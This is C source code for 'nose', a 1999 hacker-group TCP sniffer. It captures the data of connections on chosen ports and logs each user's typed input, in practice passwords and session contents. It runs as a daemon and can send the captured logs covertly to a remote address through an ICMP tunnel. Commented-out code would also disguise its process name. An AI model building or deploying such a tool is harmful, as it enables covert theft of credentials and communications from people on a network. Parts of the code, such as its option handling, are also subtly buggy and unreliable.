/*
** usage:       nose [-T <ip addr>] [-t <val>] [-I] [-O] [-n] [-f] [-s <capture size>] [-i <iface>] [-l <logfile>] <port range>
**                -l logfile (filename, stdout, stderr, ...)
**                -i interface (eth0, eth1, ...)
**                -s capture size
**                -f set sniff 'till FIN or RST
**                -n DON'T make a DNS lookup
**                -I DON'T capture input/client-stream
**                -O DON'T capture output/server-stream
**                -t set timeout value (0 = no timeout)
**                -r set replacement character
**                -T send log via ICMP tunnel to <ip addr>
**
** purpose:     capture tcp networkdata
**
** author:      TICK / THC  <tick@thehackerschoice.com>
**
** last update: 1999/04/12
**
***********************************************************************************
** Time is obsolet.
**      -- TICK
***********************************************************************************
*/

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/types.h>
#include "deamon_spell.h"
#include "pcaptcp.h"
#include "dns_lib.h"
#include "icmp_tunnel.h"
#include "error.h"

#define DEFLOG      "./nose.sniff"
#define DEFPROTO    "tcp"
#define DEFCAPSIZE  2049
#define DEFCHAR     '.'

#define INPUT       "\n< "
#define OUTPUT      "\n> "
#define PASS        1
#define IGNORE      0

#define TRUE        1
#define FALSE       0

#define UNKNOWN     0
#define ESTABLISH   1
#define DATA        2
#define CLOSE       3
#define TIMEDOUT    4 

#define TIMEOUT     7

#define SNAPLEN     (ETHHDR+TCPIPHDR+MAXLOAD)
#define TO_MS       10000000

#define PS_FAKE     "TEST"

#define USAGE(str)  err_mesg(FATAL, "\n%s [-T <ip addr>] [-r <char>] [-t <timeout value>] [-I] [-O] [-n] [-f] [-s <capture size>] [-i <iface>] [-l <logfile>] <portrange>\n", str)

#define LOGIT(str) \
{ \
  /*memset(sndmsg, 0, MAXMESG+1); */\
  sprintf(sndmsg, "%s", str); \
  if(dotunnel) \
    tunnel_send(sndmsg, strlen(sndmsg), ip_addr); \
  else \
    fputs(sndmsg, logfd); \
}

#ifndef IPPROTO_TCP
  #define IPPROTO_TCP 6
#endif

static sigjmp_buf     procstat;
volatile sig_atomic_t timeout = 0;
extern int            eit_errno; 

/*
** informations about the sniffed connection
*/
struct
{
  u_long  src_addr;
  u_long  dst_addr;
  u_short src_port;
  u_short dst_port;
  u_char  active;
  u_int   amount;
  time_t  start_time;
  time_t  end_time;
} victim;
              
/*
** some globals
*/
char    logfile[1024] = {0};
u_short *sniffports = NULL;
u_long  ip_addr = 0;
u_int   capsize = 0;
u_int   finsniff = 0;
u_int   dontlookup = 0;
u_int   dotunnel = 0;
u_int   nooutput = 0;
u_int   noinput = 0;
u_int   output = 0;
u_int   input = 0;
u_int   isestablished = 0;
u_int   toval = TIMEOUT;
char    replchar = DEFCHAR;

char    *prgnam;
FILE    *logfd;

char    sndmsg[MAXMESG+1], rcvmsg[MAXMESG+1];

/*
** function declarations
*/
void        killed(int signo);
void        clear_arg(char *str);
void        log_hdr(char *tcpip_pack);
inline void log_load_input(char *load, int loadlen);
inline void log_load_output(char *load, int loadlen);
void        log_close(char *tcpip_pack);
void        log_timeout(void);
static void sigtimeout(int signr);
u_short *   get_ports(char *origexpr);
inline int  nose(char *tcpip_pack, int *loadlen);
inline int  filter(char *tcpip_pack, int *status);
int         set_signal(int signr, void (*fkt_ptr) (int));


/***********************************************************************
**
**          M A I N
*/
int main(int argc, char **argv)
{
  int    opt;
  int    loadlen;
  int    argctmp;
  char   tcpip_pack[TCPIPHDR+MAXLOAD] = {0};
  char   iface[11] = {0};
  char   **argvtmp;
   
  prgnam = argv[0];

  opterr = 0;
  optind = 1;
  while( (opt = getopt(argc, argv, "T:r:t:l:i:s:fnIO")) != EOF)
  {
    switch(opt)
    {
      case 'T':
        if(optarg[0] == 0)
        {
          USAGE(prgnam);
          exit(-1);
        }
        ip_addr = nameResolve(optarg);
        dotunnel = 1;
        break;
      case 'r':
        if(!isalpha(optarg[0]))
        {
          USAGE(prgnam);
          exit(-1);
        }
        toval = (char) optarg[0];
        break;
      case 't':
        if(!isdigit(optarg[0]))
        {
          USAGE(prgnam);
          exit(-1);
        }
        toval = (u_int) atoi(optarg);
        break;
      case 'I':
        noinput = 1;
        break;
      case 'O':
        nooutput = 1;
        break;
      case 'n':
        dontlookup = 1;
        break;
      case 'f':
        finsniff = 1;
        break;
      case 'l':
        if(strlen(optarg) >= sizeof(logfile))
          err_mesg(FATAL, "\n'logfile' is too long.\n");
        strcpy(logfile, optarg);
        break;
      case 'i':
        if(strlen(optarg) >= sizeof(iface))
          err_mesg(FATAL, "\n'iface' is too long.\n");
        strcpy(iface, optarg);
        break;
      case 's':
        if(strlen(optarg) <= 0 || !isdigit(optarg[0]))
          USAGE(prgnam);
        capsize = (u_int) atoi(optarg);
        break;
    }
  }
  argctmp = argc;
  argvtmp = argv;
  argc -= optind;
  argv += optind;

  /*
  ** check port range
  */
  if(argc != 1)
    USAGE(prgnam);
  if(!isdigit(argv[0][0]))
    USAGE(prgnam);
  sniffports = get_ports(argv[0]);
                
  /*
  ** check capture size
  */
  if(finsniff && capsize)
    err_mesg(FATAL, "\nYou can't set FIN-sniff _and_ capture-length!\n");
  if(!finsniff) 
    capsize = capsize ? capsize : DEFCAPSIZE;
  if(logfile[0] && dotunnel)
    err_mesg(FATAL, "\nIts useless to tunnel the log and at the same time writing it to a file!\n");

  /*
  ** check logfile
  */
  if(!dotunnel)
  {
    if(!logfile[0])
      strcpy(logfile, DEFLOG);
    if(!strcmp(logfile, "stdout"))
      logfd = stdout;
    else if (!strcmp(logfile, "stderr"))
      logfd = stderr;
    else if( (logfd = fopen(logfile, "a")) == NULL)
      err_mesg(FATAL_SYS, "\nCan't append to file %s\nSYSERR:", logfile);
  }

  /*
  ** well lets init the tunnel if needed... its not explicity necessary but looks good ;)
  */
  if(tunnel_init() < 0)
  {
    switch(eit_errno)
    {
      case EIT_PROTO:  err_mesg(FATAL_SYS, "\nERROR: tunnel_init(), PROTO\nSYSERR");
      case EIT_SOCKET: err_mesg(FATAL_SYS, "\nERROR: tunnel_init(), SOCKET\nSYSERR");
      default:         err_mesg(FATAL_SYS, "\nERROR: tunnel_init(), UNKNOWN\nSYSERR");
    }
  }

  /*
  ** so ka, time to set up the pcap stuff
  */
  init_pcap(iface[0] ? iface : NULL, DEFPROTO, SNAPLEN, TO_MS, 1);

  /*
  ** deamon spell
  */
  if(strcmp(logfile, "stdout") && strcmp(logfile, "stderr"))
    if(deamon_spell())
      err_mesg(FATAL_SYS, "\nCan't become deamon.\nSYSERR:");
  
  /*
  ** signalhandling
  */
  signal(SIGHUP,  SIG_IGN);
  signal(SIGINT,  killed);
  signal(SIGTERM, killed);
  signal(SIGKILL, killed);
  signal(SIGQUIT, killed);

  if(toval > 0)
  {
    alarm(0);
    (void) set_signal(SIGALRM, sigtimeout);
  }

  /*
  ** clean cmdline
  *
  while(argctmp)
    clear_arg(argvtmp[--argctmp]);
  strcpy(argvtmp[0], PS_FAKE);
  */
  
  /*
  ** start sniffing
  */
  while(1)
  {
    /*
    ** get next/new data-packet
    */
    switch(nose(tcpip_pack, &loadlen))
    {
      case ESTABLISH:
        victim.start_time = time(NULL);
        log_hdr(tcpip_pack);
        isestablished = 1;
        break;
      case DATA:
        if(!noinput && input && loadlen)
          log_load_input(tcpip_pack+TCPIPHDR, loadlen);
        else if(!nooutput && output && loadlen)
          log_load_output(tcpip_pack+TCPIPHDR, loadlen);
        break;
      case CLOSE:
        isestablished = 0;
        victim.end_time = time(NULL);
        log_close(tcpip_pack);
        memset(&victim, 0, sizeof(victim));
	break;
      case TIMEDOUT:
        isestablished = 0;
        victim.end_time = time(NULL);
        log_timeout();
        memset(&victim, 0, sizeof(victim));
    }
        
    /*
    ** did we capture enough data?
    */
    if(!finsniff)
      if(victim.amount >= capsize)
      {
        victim.end_time = time(NULL);
        log_close(tcpip_pack);
        memset(&victim, 0, sizeof(victim));
      }
    
    memset(tcpip_pack, 0, TCPIPHDR+MAXLOAD);
    
    if(!dotunnel)
      fflush(logfd);
  }

  exit(-1);
}

/******************************************************************************/

int set_signal(int signr, void (*fkt_ptr)(int))
{
  struct sigaction sig_act;

  sig_act.sa_handler = fkt_ptr;
  sigemptyset(&sig_act.sa_mask);
  sig_act.sa_flags = 0;

  #ifdef SA_INTERRUPT   /* Solaris */
    sig_act.sa_flags |= SA_INTERRUPT;  /* don't restart read()-call */
  #endif

  if(sigaction(signr, &sig_act, NULL) < 0)
  {
    perror("ERROR");
    exit(-1);
  }

  return(0);
}

static void sigtimeout(int signr)
{
  timeout = 1;

  siglongjmp(procstat, TRUE);

  return;
}

void killed(int signo)
{
  LOGIT("\n\n\tSOMEONE KILLED ME!!!\n")

  /*fsync(logfd);*/
  if(dotunnel)
    tunnel_reset();
  else
    fclose(logfd);

  exit(0);
}


inline int nose(char *tcpip_pack, int *loadlen)
{
  register int  packlen;
  int           status;


  if(sigsetjmp(procstat, TRUE))
    goto tojmp;

  while(1)
  {
    if(toval > 0 && isestablished)
      alarm(toval);
    else
      alarm(0);
    if((packlen = readtcp(tcpip_pack, tcpip_pack+IPHDR, tcpip_pack+TCPIPHDR)) > 1)
    {
      packlen -= (ETHHDR + IPHDR + TCPHDR);

      if(packlen < 0)
        continue;
      
      if(filter(tcpip_pack, &status) == IGNORE)
	continue;

      alarm(0);
      timeout = 0;
      *loadlen = packlen;
      return(status);
    }
tojmp:
    if(timeout)
    {
      timeout = 0;
      return(TIMEDOUT);
    }
  }
}


inline int filter(char *tcpip_pack, int *status)
{
  u_int           ctr;
  struct ti_pack  *ti_ptr = (struct ti_pack *) tcpip_pack;
  
  
  *status = UNKNOWN;

  /*
  ** first check the protocol type.
  */
  if(ti_ptr->ip.protocol != IPPROTO_TCP)
    return(IGNORE);          

  /*
  ** check ports
  */
  for(ctr = 0; sniffports[ctr] != 0; ctr++)
  {
    /* IMPROVE THIS !!! */
    if(ti_ptr->tcp.dest   == htons(sniffports[ctr]) ||
       ti_ptr->tcp.source == htons(sniffports[ctr])    )
      break;
  }
  if(sniffports[ctr] == 0)
    return(IGNORE);


  if(victim.active == FALSE)  /* we don't capture a connection */
  {
    if(ti_ptr->tcp.syn == FALSE)  /* looking for a new connection */
      return(IGNORE);

    /*
    ** a new connection was initiated
    */
    victim.src_addr   = ti_ptr->ip.saddr;
    victim.dst_addr   = ti_ptr->ip.daddr;
    victim.src_port   = ti_ptr->tcp.source;
    victim.dst_port   = ti_ptr->tcp.dest;
    victim.active     = TRUE;
    victim.amount     = 0;
    
    *status = ESTABLISH;
    return(PASS);
  }
  
  /*
  ** We already capture an established connection, so ignore the packet
  ** if it's a TCP SYN.
  **
  ** This check isn't really necessary but it's faster.
  */
  if(ti_ptr->tcp.syn == TRUE)
    return(IGNORE);

  /*
  ** It's a TCP packet of an already established connection, so let's check
  ** if it's part of our data-stream.
  **
  ** We check for both directions.
  */
  if(ti_ptr->tcp.dest != victim.dst_port && ti_ptr->tcp.dest != victim.src_port)
    return(IGNORE);
  if(ti_ptr->tcp.source != victim.src_port && ti_ptr->tcp.source != victim.dst_port)
    return(IGNORE);
  if(ti_ptr->ip.saddr != victim.src_addr && ti_ptr->ip.saddr != victim.dst_addr)
    return(IGNORE);
  if(ti_ptr->ip.daddr != victim.dst_addr && ti_ptr->ip.daddr != victim.src_addr)
    return(IGNORE);
  
  /*
  ** check if the connection is closed
  */
  if(ti_ptr->tcp.rst == TRUE || ti_ptr->tcp.fin == TRUE)
  {
    *status = CLOSE;
    return(PASS);
  }
  
  /*
  ** the connection continues...
  ** examine the direction...
  */
  if(ti_ptr->ip.saddr == victim.src_addr)
  {
    input = 1;
    output = 0;
  }
  else
  {
    output = 1;
    input = 0;
  }
    
  *status = DATA;
  return(PASS);
}


void log_hdr(char *tcpip_pack)
{
  char            tmpmsg[MAXMESG+1] = {0};
  struct ti_pack  *ti_ptr = (struct ti_pack*) tcpip_pack;
  struct in_addr  addr[2];

  
  addr[0].s_addr = ti_ptr->ip.saddr;
  addr[1].s_addr = ti_ptr->ip.daddr;
   
  snprintf(tmpmsg, MAXMESG, "\n################################[ LOG START ]"
                            "################################\n"
                            "\n%s [%d] => %s [%d]\n"
                            "\n|-------------------------------[   DATA    ]"
                            "-------------------------------|\n"
                            , dontlookup ? inet_ntoa(addr[0]) : hostLookup(addr[0].s_addr)
                            , htons(ti_ptr->tcp.source)
                            , dontlookup ? inet_ntoa(addr[1]) : hostLookup(addr[1].s_addr)
                            , htons(ti_ptr->tcp.dest) );
  LOGIT(tmpmsg)
}


inline void log_load_output(char *load, int loadlen)
{
  register int  byte_ctr, col_ctr;

  
  victim.amount += loadlen;
  
  for(byte_ctr = 0, col_ctr = 0; byte_ctr < loadlen; byte_ctr++)
  {
    if(!col_ctr)
    {
      LOGIT(OUTPUT)
      col_ctr++;
    }
    
    if(col_ctr > 75)
      col_ctr = 0;
    
    if(load[byte_ctr] == 13 && load[byte_ctr+1] == 10) /* netascii \r\n */  
    {
      byte_ctr++;
      col_ctr = 0;
    }
    else if(isalnum(load[byte_ctr]) || ispunct(load[byte_ctr]) || load[byte_ctr] == ' ')
    {
      LOGIT(load[byte_ctr]);
      col_ctr++;
    }
    else
    {
      LOGIT(DEFCHAR)
      col_ctr++;
    }
  }
}
                     

inline void log_load_input(char *load, int loadlen)
{
  register int  byte_ctr, col_ctr; 


  victim.amount += loadlen;

  for(byte_ctr = 0, col_ctr = 0; byte_ctr < loadlen; byte_ctr++)
  {
    if(!col_ctr)
    {
      LOGIT(INPUT)
      col_ctr++;
    }
    
    if(col_ctr > 74)
      col_ctr = 0;
    
    if(load[byte_ctr] == 13 && load[byte_ctr+1] == 10) /*netascii '\r\n'*/
    {
      byte_ctr++;
      col_ctr = 0;
      return;
    }
    else if(load[byte_ctr] == 8)  /* backspace */
    {
      LOGIT("<BS>")
      col_ctr++;
    }
    /*
    else if(load[byte_ctr] == ' ')
    {
      fputc(' ', logfd);
      col_ctr++;
    }
    */
    else if(isalnum(load[byte_ctr]) || ispunct(load[byte_ctr]) || load[byte_ctr] == ' ')
    {
      LOGIT(load[byte_ctr])
      col_ctr++;
    }
    else
    {
      LOGIT(DEFCHAR)
      col_ctr++;
    }
    /*
    else
    {
      fprintf(logfd, "[0x%02X]", load[byte_ctr]);
      col_ctr++;
    }
    */
  }
}


void log_close(char *tcpip_pack)
{
  char            tmpmsg[MAXMESG+1] = {0};
  struct ti_pack  *ti_ptr = (struct ti_pack *) tcpip_pack;


  LOGIT("\n\n|-------------------------------[  CLOSED   ]-------------------------------|\n\n")
  if(ti_ptr->tcp.fin)
    LOGIT("CLOSED BY: TCP_FIN Flag\n")
  else if(ti_ptr->tcp.rst)
    LOGIT("CLOSED BY: TCP_RST Flag\n")
  else
    LOGIT("CLOSED BY: EXCEEDED CAPTURE LENGTH\n")
  
  snprintf(tmpmsg, MAXMESG, "INIT AT  : %sRESET AT : %sAMOUNT   : %d Bytes\n\n"
                           "################################[  LOG END  ]################################\n"
                          , asctime(localtime(&victim.start_time))
                          , asctime(localtime(&victim.end_time))
                          , victim.amount);
  LOGIT(tmpmsg) 
}

void log_timeout(void)
{
  char            tmpmsg[MAXMESG+1] = {0};


  LOGIT("\n\n|-------------------------------[  CLOSED   ]-------------------------------|\n\nCLOSED BY: EXCEEDED TIMEOUT\n")  
  snprintf(tmpmsg, MAXMESG, "INIT AT  : %sRESET AT : %sAMOUNT   : %d Bytes\n\n"
                           "################################[  LOG END  ]################################\n"
                          , asctime(localtime(&victim.start_time))
                          , asctime(localtime(&victim.end_time))
                          , victim.amount);
  LOGIT(tmpmsg)
}
              

u_short *get_ports(char *origexpr)
{
  int exlen = strlen(origexpr);
  char *p,*q;
  unsigned short *tmp, *ports;
  int i=0, j=0,start,end;
  char *expr = strdup(origexpr);
  char *mem = expr;

  ports = (u_short *) malloc(65536 * sizeof(short));

  for(;j < exlen; j++)
    if (expr[j] != ' ') expr[i++] = expr[j];

  expr[i] = '\0';
  exlen = i;
  i=0;

  while((p = strchr(expr,',')))
  {
    *p = '\0';
    if (*expr == '-')
    {
      start = 1;
      end = atoi(expr+ 1);
    }
    else
    {
      start = end = atoi(expr);
      if ((q = strchr(expr,'-')) && *(q+1) )
        end = atoi(q + 1);
      else if (q && !*(q+1))
        end = 65535;
    }

    if (start < 1 || start > end)
      err_mesg(FATAL, "Your port specifications are illegal!");

    for(j=start; j <= end; j++)
      ports[i++] = j;
    expr = p + 1;
  }

  if (*expr == '-')
  {
    start = 1;
    end = atoi(expr+ 1);
  }
  else
  {
    start = end = atoi(expr);
    if ((q =  strchr(expr,'-')) && *(q+1) )
      end = atoi(q+1);
    else if (q && !*(q+1))
      end = 65535;
  }

  if (start < 1 || start > end)
    err_mesg(FATAL, "Your port specifications are illegal!");

  for(j=start; j <= end; j++)
    ports[i++] = j;

  ports[i++] = 0;
  tmp = (u_short *) realloc(ports, i * sizeof(short));
  free(mem);

  return(tmp);
}
